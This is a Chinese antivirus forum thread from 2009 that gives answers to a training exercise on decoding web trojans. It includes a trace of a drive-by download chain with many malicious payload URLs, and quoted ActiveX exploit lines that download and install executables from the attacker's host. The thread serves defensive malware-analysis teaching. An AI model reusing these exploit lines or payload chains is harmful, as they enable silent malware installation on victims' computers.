瑞星卡卡安全论坛

首页 » 综合娱乐区 » 活动专区 » 实习生专区 » 实习生交流区 » 网马解密练习(十五)答案
networkedition - 2009-8-13 17:02:00
Log is generated by FreShow.
[wide]http://kf.shangdu.com/news/moshou/?35288
    [script]http://js.azzwg.cn/down/downwow/ads1.js
        [frame]http://dl.azzwg.cn/down/downwow/ui.htm
        [frame]http://30mm.azzwg.cn/ms/mm.htm
            [script]http://30mm.azzwg.cn/ms/014.js
                [object]http://30mm.azzwg.cn/ms/014.exe
            [frame]http://30mm.azzwg.cn/ms/m09002.htm
                [script]http://30mm.azzwg.cn/ms/m09002.js
                    [object]http://boyuo.cn/ms/m09002.css
            [frame]http://30mm.azzwg.cn/ms/lzn.htm
                [object]http://boyuo.cn/ms/lzn.exe
            [frame]http://30mm.azzwg.cn/ms/ff/flash.asp?id='+Flashver+'
                [object]http://30mm.azzwg.cn/cb/ff/GG28.swf
                    [object]http://boyuo.cn/cb/ff/flash.exe
            [script]http://30mm.azzwg.cn/ms/real.js
                [object]http://boyuo.cn/ms/real.exe
            [frame]http://30mm.azzwg.cn/ms/realn.htm
                [object]http://boyuo.cn/ms/ren.exe
            [frame]http://30mm.azzwg.cn/ms/bfn.htm
                [script]http://30mm.azzwg.cn/ms/bfn.js
                    [object]http://boyuo.cn/ms/bfn.exe
        [frame]http://ad.xyqobai198.cn/ad/
    [script]http://js.users.51.la/461930.js
    [script]http://kf.shangdu.com/news/moshou/ui.js

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
QoS - 2009-8-13 17:39:00
swf  怎么下载不来了呢?


 附件: 您所在的用户组无法下载或查看附件
merrk_chuan - 2009-8-13 19:06:00
最终的swf不是gg.swf, 仔细看下mm.htm 那个网页的源码,这个swf的和老师的教程里提到的是一样的
Lighting_Cui - 2009-8-13 21:07:00
:kaka8: 看来是露看了教程。。。寻找中
基牛 - 2009-8-14 3:25:00
老师,对于这个木马怎么看
[frame]http://30mm.azzwg.cn/ms/mm.htm
            [object]http://30mm.azzwg.cn/ms/sina.exe
              [object]http://30mm.azzwg.cn/ms/UU.ini

这两个是mm.htm这个网页中,“var myurl="http://30mm.azzwg.cn/ms/";”
Sina["DownloadAndInstall"](myurl+"sina.exe")

firewallholdup.ini我下载下来,里面是http://30mm.azzwg.cn/ms/UUSee.CAB这个地址,又下载,似乎是uuSEE的安装程序
storm["Update"]("\Program Files\Common Files\uusee\" ,myurl+"UU.ini","",1)

他们会构成威胁吗
QoS - 2009-8-14 10:06:00
谢谢,同学提醒!知道!!
networkedition - 2009-8-14 10:55:00
你的这个问题我给你回复了,在练习的那篇帖子里。
networkedition - 2009-8-14 11:05:00
不错,很好,看得很仔细。那两个的确也是网马,sina.exe是利用到sinauc的漏洞可通过clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A来判断漏洞类型,另外uusee.cab也是病毒,瑞星10版报:Trojan.Win32.Nodef.ibv,clsid:2CACD7BB-1-6E83F82C813B-1C59-4BBB-8E8 uusee网络电视漏洞。
1
查看完整版本: 网马解密练习(十五)答案
© 2000 - 2026 Rising Corp. Ltd.